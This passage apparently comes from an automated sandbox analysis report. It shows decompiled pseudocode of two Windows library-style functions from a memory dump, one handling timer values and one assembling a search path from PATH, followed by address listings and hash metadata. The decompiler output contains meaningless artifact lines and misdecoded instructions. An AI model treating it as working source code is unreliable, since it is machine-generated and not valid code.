				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x4c3d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E04B67D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E04C18CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E04B89E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E04B8B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E04B8CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E04B67D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E04C18F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E04B8AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x4c38628; // 0x0
								_v68 = _t77;
								_t78 =  *0x4c3862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x4c38628; // 0x0
							_t116 =  *0x4c3862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                    0x04b6b94c
                                                    0x04b6b956
                                                    0x04b6b95c
                                                    0x04b6b95e
                                                    0x04b6b964
                                                    0x04b6b969
                                                    0x04b6b96d
                                                    0x04b6b96d
                                                    0x04b6b970
                                                    0x04b6b974
                                                    0x04b6b97a
                                                    0x04b6badf
                                                    0x04b6badf
                                                    0x04b6bae2
                                                    0x04b6bae4
                                                    0x04b6bae6
                                                    0x04b6baf0
                                                    0x04bb2cb8
                                                    0x04b6baf6
                                                    0x04b6baf6
                                                    0x04b6baf6
                                                    0x04b6bafd
                                                    0x04b6bb1f
                                                    0x04b6bb1f
                                                    0x04b6baff
                                                    0x04b6bb00
                                                    0x04b6bb00
                                                    0x04b6bb03
                                                    0x04b6bb03
                                                    0x04b6bacb
                                                    0x04b6bacf
                                                    0x04b6bad0
                                                    0x04b6bad1
                                                    0x04b6badc
                                                    0x04b6badc
                                                    0x04b6b980
                                                    0x04b6b980
                                                    0x04b6b988
                                                    0x04b6b98b
                                                    0x04b6b98d
                                                    0x04b6b990
                                                    0x04b6b993
                                                    0x04b6b999
                                                    0x04b6b99b
                                                    0x04b6b9a1
                                                    0x04b6b9a5
                                                    0x04b6b9aa
                                                    0x04b6b9b0
                                                    0x04b6b9bb
                                                    0x04b6b9c0
                                                    0x04b6b9c3
                                                    0x04b6b9ca
                                                    0x04b6b9cc
                                                    0x04b6b9cf
                                                    0x04b6b9d3
                                                    0x04b6b9d7
                                                    0x04b6ba94
                                                    0x04b6ba94
                                                    0x04b6ba98
                                                    0x04b6baa3
                                                    0x04bb2ccb
                                                    0x04b6baa9
                                                    0x04b6baa9
                                                    0x04b6baa9
                                                    0x04b6bab1
                                                    0x04bb2cd5
                                                    0x04bb2cdd
                                                    0x04bb2cdd
                                                    0x04b6babb
                                                    0x04b6babc
                                                    0x04b6bac2
                                                    0x04b6bac3
                                                    0x04b6bac3
                                                    0x04b6bac6
                                                    0x00000000
                                                    0x04b6b9dd
                                                    0x04b6b9dd
                                                    0x04b6b9e7
                                                    0x04b6b9e7
                                                    0x04b6b9ec
                                                    0x04b6b9ec
                                                    0x04b6b9f1
                                                    0x04b6b9f5
                                                    0x04b6b9fa
                                                    0x04b6ba00
                                                    0x04b6ba0c
                                                    0x04b6ba10
                                                    0x04b6ba10
                                                    0x04b6ba12
                                                    0x04b6ba18
                                                    0x00000000
                                                    0x00000000
                                                    0x04b6bb26
                                                    0x04b6bb26
                                                    0x04b6ba1e
                                                    0x04b6ba1e
                                                    0x04b6ba23
                                                    0x04b6ba25
                                                    0x04b6ba2c
                                                    0x04b6ba30
                                                    0x04b6ba35
                                                    0x04b6ba35
                                                    0x04b6ba41
                                                    0x04b6ba46
                                                    0x04b6ba4c
                                                    0x04b6ba50
                                                    0x04b6ba54
                                                    0x04b6ba6a
                                                    0x04b6ba6e
                                                    0x04b6ba70
                                                    0x04b6ba74
                                                    0x04b6ba78
                                                    0x04b6ba7a
                                                    0x04b6ba7c
                                                    0x04b6ba8e
                                                    0x04b6ba90
                                                    0x04b6ba92
                                                    0x04b6bb14
                                                    0x04b6bb14
                                                    0x04b6bb16
                                                    0x04b6bb16
                                                    0x00000000
                                                    0x04b6ba7c
                                                    0x04b6bb0a
                                                    0x04b6bb0d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b6bb0f

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B6B9A5
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID:
                                                    • API String ID: 885266447-0
                                                    • Opcode ID: 0617b3989d06b9f3d40f001b0d71635338ad547d137f5ec8e69d67039e392443
                                                    • Instruction ID: 99fc51b04c11102caca0b0d922bed8296cfcab51001c9672dee4dd1ce435c2e4
                                                    • Opcode Fuzzy Hash: 0617b3989d06b9f3d40f001b0d71635338ad547d137f5ec8e69d67039e392443
                                                    • Instruction Fuzzy Hash: 4D513571A08350CFC720DF29C080A2ABBF9FB88614F1449AEE596C7355EB75F845CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B72581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 83%
                                                    			E04B72581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t233;
				signed int _t237;
				signed int _t248;
				signed int _t250;
				intOrPtr _t252;
				signed int _t255;
				signed int _t262;
				signed int _t265;
				signed int _t273;
				intOrPtr _t279;
				signed int _t281;
				signed int _t283;
				signed int _t291;
				unsigned int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t304;
				intOrPtr _t316;
				signed int _t325;
				signed int _t327;
				signed int _t328;
				signed int _t332;
				signed int _t333;
				void* _t335;
				signed int _t336;
				signed int _t338;
				signed int _t340;
				void* _t341;

				_t338 = _t340;
				_t341 = _t340 - 0x4c;
				_v8 =  *0x4c3d360 ^ _t338;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t332 = 0x4c3b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t294 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t279 = 0x48;
				_t314 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t325 = 0;
				_v37 = _t314;
				if(_v48 <= 0) {
					L16:
					_t45 = _t279 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t333 = 0xc0000106;
						goto L32;
					} else {
						_t332 = L04B64620(_t294,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t279);
						_v52 = _t332;
						__eflags = _t332;
						if(_t332 == 0) {
							_t333 = 0xc0000017;
							goto L32;
						} else {
							 *(_t332 + 0x44) =  *(_t332 + 0x44) & 0x00000000;
							_t50 = _t332 + 0x48; // 0x48
							_t327 = _t50;
							_t314 = _v32;
							 *((intOrPtr*)(_t332 + 0x3c)) = _t279;
							_t281 = 0;
							 *((short*)(_t332 + 0x30)) = _v48;
							__eflags = _t314;
							if(_t314 != 0) {
								 *(_t332 + 0x18) = _t327;
								__eflags = _t314 - 0x4c38478;
								 *_t332 = ((0 | _t314 == 0x04c38478) - 0x00000001 & 0xfffffffb) + 7;
								E04B8F3E0(_t327,  *((intOrPtr*)(_t314 + 4)),  *_t314 & 0x0000ffff);
								_t314 = _v32;
								_t341 = _t341 + 0xc;
								_t281 = 1;
								__eflags = _a8;
								_t327 = _t327 + (( *_t314 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t273 = E04BD39F2(_t327);
									_t314 = _v32;
									_t327 = _t273;
								}
							}
							_t298 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t333 = _v68;
								__eflags = 0;
								 *((short*)(_t327 - 2)) = 0;
								goto L32;
							} else {
								_t283 = _t332 + _t281 * 4;
								_v56 = _t283;
								do {
									__eflags = _t314;
									if(_t314 != 0) {
										_t233 =  *(_v60 + _t298 * 4);
										__eflags = _t233;
										if(_t233 == 0) {
											goto L30;
										} else {
											__eflags = _t233 == 5;
											if(_t233 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t283 =  *(_v60 + _t298 * 4);
										 *(_t283 + 0x18) = _t327;
										_t237 =  *(_v60 + _t298 * 4);
										__eflags = _t237 - 8;
										if(_t237 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t237 * 4 +  &M04B72959))) {
												case 0:
													__ax =  *0x4c38488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E04B8F3E0(__edi,  *0x4c3848c, __ax & 0x0000ffff);
														__eax =  *0x4c38488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E04B8F3E0(_t327, _v80, _v64);
													_t268 = _v64;
													goto L26;
												case 2:
													 *0x4c38480 & 0x0000ffff = E04B8F3E0(__edi,  *0x4c38484,  *0x4c38480 & 0x0000ffff);
													__eax =  *0x4c38480 & 0x0000ffff;
													__eax = ( *0x4c38480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E04B8F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E04B8F3E0(_t327, _v76, _v36);
														_t268 = _v36;
													}
													L26:
													_t341 = _t341 + 0xc;
													_t327 = _t327 + (_t268 >> 1) * 2 + 2;
													__eflags = _t327;
													L27:
													_push(0x3b);
													_pop(_t270);
													 *((short*)(_t327 - 2)) = _t270;
													goto L28;
												case 6:
													__ebx =  *0x4c3575c;
													__eflags = __ebx - 0x4c3575c;
													if(__ebx != 0x4c3575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E04B8F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x4c3575c;
														} while (__ebx != 0x4c3575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x4c38478 & 0x0000ffff = E04B8F3E0(__edi,  *0x4c3847c,  *0x4c38478 & 0x0000ffff);
													__eax =  *0x4c38478 & 0x0000ffff;
													__eax = ( *0x4c38478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E04BD39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x4c36e58 & 0x0000ffff = E04B8F3E0(__edi,  *0x4c36e5c,  *0x4c36e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x4c36e58 & 0x0000ffff;
													__eax = ( *0x4c36e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t298 = _v16;
													_t314 = _v32;
													L29:
													_t283 = _t283 + 4;
													__eflags = _t283;
													_v56 = _t283;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t298 = _t298 + 1;
									_v16 = _t298;
									__eflags = _t298 - _v48;
								} while (_t298 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t237 =  *(_v60 + _t325 * 4);
						if(_t237 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t237 * 4 +  &M04B72935))) {
							case 0:
								__ax =  *0x4c38488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t314 =  &_v64;
								_v80 = E04B72E3E(0,  &_v64);
								_t279 = _t279 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x4c38480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x4c38480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E04B5EEF0(0x4c379a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E04B5EB70(__ecx, 0x4c379a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t211 = _v72;
											__eflags = _t211;
											if(_t211 != 0) {
												L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t211);
											}
											_t212 = _v52;
											__eflags = _t212;
											if(_t212 != 0) {
												__eflags = _t333;
												if(_t333 < 0) {
													L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t212);
													_t212 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t294 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x4c37b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L04B64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E04B5EB70(__ecx, 0x4c379a0);
										__eax = _v52;
										L36:
										_pop(_t326);
										_pop(_t334);
										__eflags = _v8 ^ _t338;
										_pop(_t280);
										return E04B8B640(_t212, _t280, _v8 ^ _t338, _t314, _t326, _t334);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t275 = _v56;
								if(_v56 != 0) {
									_t314 =  &_v36;
									_t277 = E04B72E3E(_t275,  &_v36);
									_t294 = _v36;
									_v76 = _t277;
								}
								if(_t294 == 0) {
									goto L44;
								} else {
									_t279 = _t279 + 2 + _t294;
								}
								goto L14;
							case 6:
								__eax =  *0x4c35764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x4c38478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x4c38478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x4c36e58 & 0x0000ffff;
								__eax = ( *0x4c36e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t325 = _t325 + 1;
								if(_t325 >= _v48) {
									goto L16;
								} else {
									_t314 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_push(0x25);
					asm("int 0x29");
					asm("out 0x28, al");
					asm("o16 sub [edi-0x48d81ffc], dh");
					_t335 = _t332 + 1;
					 *((intOrPtr*)(_t327 - 0x48d9fafc)) =  *((intOrPtr*)(_t327 - 0x48d9fafc)) - _t314;
					 *((intOrPtr*)(_t327 - 0x48d809fc)) =  *((intOrPtr*)(_t327 - 0x48d809fc)) - _t314;
					 *((intOrPtr*)(_t327 - 0x48d7b1fc)) =  *((intOrPtr*)(_t327 - 0x48d7b1fc)) - _t314;
					asm("daa");
					asm("fcomp dword [ebx-0x45]");
					 *((intOrPtr*)(_t327 - 0x44a3cbfc)) =  *((intOrPtr*)(_t327 - 0x44a3cbfc)) - _t314;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x4c1ff00);
					E04B9D08C(4, _t327, _t335);
					_v44 =  *[fs:0x18];
					_t328 = 0;
					 *_a24 = 0;
					_t291 = _a12;
					__eflags = _t291;
					if(_t291 == 0) {
						_t248 = 0xc0000100;
					} else {
						_v8 = 0;
						_t336 = 0xc0000100;
						_v52 = 0xc0000100;
						_t250 = 4;
						while(1) {
							_v40 = _t250;
							__eflags = _t250;
							if(_t250 == 0) {
								break;
							}
							_t304 = _t250 * 0xc;
							_v48 = _t304;
							__eflags = _t291 -  *((intOrPtr*)(_t304 + 0x4b21664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t265 = E04B8E5C0(_a8,  *((intOrPtr*)(_t304 + 0x4b21668)), _t291);
									_t341 = _t341 + 0xc;
									__eflags = _t265;
									if(__eflags == 0) {
										_t336 = E04BC51BE(_t291,  *((intOrPtr*)(_v48 + 0x4b2166c)), _a16, _t328, _t336, __eflags, _a20, _a24);
										_v52 = _t336;
										break;
									} else {
										_t250 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t250 = _t250 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t336;
						__eflags = _t336;
						if(_t336 < 0) {
							__eflags = _t336 - 0xc0000100;
							if(_t336 == 0xc0000100) {
								_t300 = _a4;
								__eflags = _t300;
								if(_t300 != 0) {
									_v36 = _t300;
									__eflags =  *_t300 - _t328;
									if( *_t300 == _t328) {
										_t336 = 0xc0000100;
										goto L76;
									} else {
										_t316 =  *((intOrPtr*)(_v44 + 0x30));
										_t252 =  *((intOrPtr*)(_t316 + 0x10));
										__eflags =  *((intOrPtr*)(_t252 + 0x48)) - _t300;
										if( *((intOrPtr*)(_t252 + 0x48)) == _t300) {
											__eflags =  *(_t316 + 0x1c);
											if( *(_t316 + 0x1c) == 0) {
												L106:
												_t336 = E04B72AE4( &_v36, _a8, _t291, _a16, _a20, _a24);
												_v32 = _t336;
												__eflags = _t336 - 0xc0000100;
												if(_t336 != 0xc0000100) {
													goto L69;
												} else {
													_t328 = 1;
													_t300 = _v36;
													goto L75;
												}
											} else {
												_t255 = E04B56600( *(_t316 + 0x1c));
												__eflags = _t255;
												if(_t255 != 0) {
													goto L106;
												} else {
													_t300 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t336 = E04B72C50(_t300, _a8, _t291, _a16, _a20, _a24, _t328);
											L76:
											_v32 = _t336;
											goto L69;
										}
									}
									goto L108;
								} else {
									E04B5EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t336 = _a24;
									_t262 = E04B72AE4( &_v36, _a8, _t291, _a16, _a20, _t336);
									_v32 = _t262;
									__eflags = _t262 - 0xc0000100;
									if(_t262 == 0xc0000100) {
										_v32 = E04B72C50(_v36, _a8, _t291, _a16, _a20, _t336, 1);
									}
									_v8 = _t328;
									E04B72ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t248 = _t336;
					}
					L70:
					return E04B9D0D1(_t248);
				}
				L108:
			}

















































                                                    0x04b72584
                                                    0x04b72586
                                                    0x04b72590
                                                    0x04b72596
                                                    0x04b72597
                                                    0x04b72598
                                                    0x04b72599
                                                    0x04b7259e
                                                    0x04b725a4
                                                    0x04b725a9
                                                    0x04b725ac
                                                    0x04b725ae
                                                    0x04b725b1
                                                    0x04b725b2
                                                    0x04b725b5
                                                    0x04b725b8
                                                    0x04b725bb
                                                    0x04b725bc
                                                    0x04b725bf
                                                    0x04b725c2
                                                    0x04b725c5
                                                    0x04b725c6
                                                    0x04b725cb
                                                    0x04b725ce
                                                    0x04b725d8
                                                    0x04b725dd
                                                    0x04b725de
                                                    0x04b725e1
                                                    0x04b725e3
                                                    0x04b725e9
                                                    0x04b726da
                                                    0x04b726da
                                                    0x04b726dd
                                                    0x04b726e2
                                                    0x04bb5b56
                                                    0x00000000
                                                    0x04b726e8
                                                    0x04b726f9
                                                    0x04b726fb
                                                    0x04b726fe
                                                    0x04b72700
                                                    0x04bb5b60
                                                    0x00000000
                                                    0x04b72706
                                                    0x04b72706
                                                    0x04b7270a
                                                    0x04b7270a
                                                    0x04b7270d
                                                    0x04b72713
                                                    0x04b72716
                                                    0x04b72718
                                                    0x04b7271c
                                                    0x04b7271e
                                                    0x04bb5b6c
                                                    0x04bb5b6f
                                                    0x04bb5b7f
                                                    0x04bb5b89
                                                    0x04bb5b8e
                                                    0x04bb5b93
                                                    0x04bb5b96
                                                    0x04bb5b9c
                                                    0x04bb5ba0
                                                    0x04bb5ba3
                                                    0x04bb5bab
                                                    0x04bb5bb0
                                                    0x04bb5bb3
                                                    0x04bb5bb3
                                                    0x04bb5ba3
                                                    0x04b72724
                                                    0x04b72726
                                                    0x04b72729
                                                    0x04b7272c
                                                    0x04b7279d
                                                    0x04b7279d
                                                    0x04b727a0
                                                    0x04b727a2
                                                    0x00000000
                                                    0x04b7272e
                                                    0x04b7272e
                                                    0x04b72731
                                                    0x04b72734
                                                    0x04b72734
                                                    0x04b72736
                                                    0x04bb5bc1
                                                    0x04bb5bc1
                                                    0x04bb5bc4
                                                    0x00000000
                                                    0x04bb5bca
                                                    0x04bb5bca
                                                    0x04bb5bcd
                                                    0x00000000
                                                    0x04bb5bd3
                                                    0x00000000
                                                    0x04bb5bd3
                                                    0x04bb5bcd
                                                    0x04b7273c
                                                    0x04b7273c
                                                    0x04b72742
                                                    0x04b72747
                                                    0x04b7274a
                                                    0x04b7274d
                                                    0x04b72750
                                                    0x00000000
                                                    0x04b72756
                                                    0x04b72756
                                                    0x00000000
                                                    0x04b72902
                                                    0x04b72908
                                                    0x04b7290b
                                                    0x00000000
                                                    0x04b72911
                                                    0x04b7291c
                                                    0x04b72921
                                                    0x00000000
                                                    0x04b72921
                                                    0x00000000
                                                    0x00000000
                                                    0x04b72880
                                                    0x04b72887
                                                    0x04b7288c
                                                    0x00000000
                                                    0x00000000
                                                    0x04b72805
                                                    0x04b7280a
                                                    0x04b72814
                                                    0x04b72816
                                                    0x00000000
                                                    0x00000000
                                                    0x04b7281e
                                                    0x04b72821
                                                    0x04b72823
                                                    0x00000000
                                                    0x04b72829
                                                    0x04b72829
                                                    0x04b72831
                                                    0x04b7283c
                                                    0x04b7283e
                                                    0x00000000
                                                    0x04b7283e
                                                    0x00000000
                                                    0x00000000
                                                    0x04b7284e
                                                    0x04b72850
                                                    0x04b72851
                                                    0x04b72854
                                                    0x04b72857
                                                    0x04b7285a
                                                    0x04b7285c
                                                    0x04b7285d
                                                    0x00000000
                                                    0x00000000
                                                    0x04b7275d
                                                    0x04b72761
                                                    0x00000000
                                                    0x04b72767
                                                    0x04b7276e
                                                    0x04b72773
                                                    0x04b72773
                                                    0x04b72776
                                                    0x04b72778
                                                    0x04b7277e
                                                    0x04b7277e
                                                    0x04b72781
                                                    0x04b72781
                                                    0x04b72783
                                                    0x04b72784
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb5bd8
                                                    0x04bb5bde
                                                    0x04bb5be4
                                                    0x04bb5be6
                                                    0x04bb5be8
                                                    0x04bb5be9
                                                    0x04bb5bee
                                                    0x04bb5bf8
                                                    0x04bb5bff
                                                    0x04bb5c01
                                                    0x04bb5c04
                                                    0x04bb5c07
                                                    0x04bb5c0b
                                                    0x04bb5c0d
                                                    0x04bb5c0d
                                                    0x04bb5c15
                                                    0x04bb5c18
                                                    0x04bb5c1b
                                                    0x04bb5c1b
                                                    0x04bb5c1e
                                                    0x00000000
                                                    0x00000000
                                                    0x04b728c3
                                                    0x04b728c8
                                                    0x04b728d2
                                                    0x04b728d4
                                                    0x04b728d8
                                                    0x04b728db
                                                    0x04bb5c26
                                                    0x04bb5c28
                                                    0x04bb5c2d
                                                    0x04bb5c2d
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb5c34
                                                    0x04bb5c36
                                                    0x04bb5c49
                                                    0x04bb5c4e
                                                    0x04bb5c54
                                                    0x04bb5c5b
                                                    0x04bb5c5d
                                                    0x04bb5c60
                                                    0x04b72788
                                                    0x04b72788
                                                    0x04b7278b
                                                    0x04b7278e
                                                    0x04b7278e
                                                    0x04b7278e
                                                    0x04b72791
                                                    0x00000000
                                                    0x00000000
                                                    0x04b72756
                                                    0x04b72750
                                                    0x00000000
                                                    0x04b72794
                                                    0x04b72794
                                                    0x04b72795
                                                    0x04b72798
                                                    0x04b72798
                                                    0x00000000
                                                    0x04b72734
                                                    0x04b7272c
                                                    0x04b72700
                                                    0x04b725ef
                                                    0x04b725ef
                                                    0x04b725ef
                                                    0x04b725f2
                                                    0x04b725f8
                                                    0x00000000
                                                    0x00000000
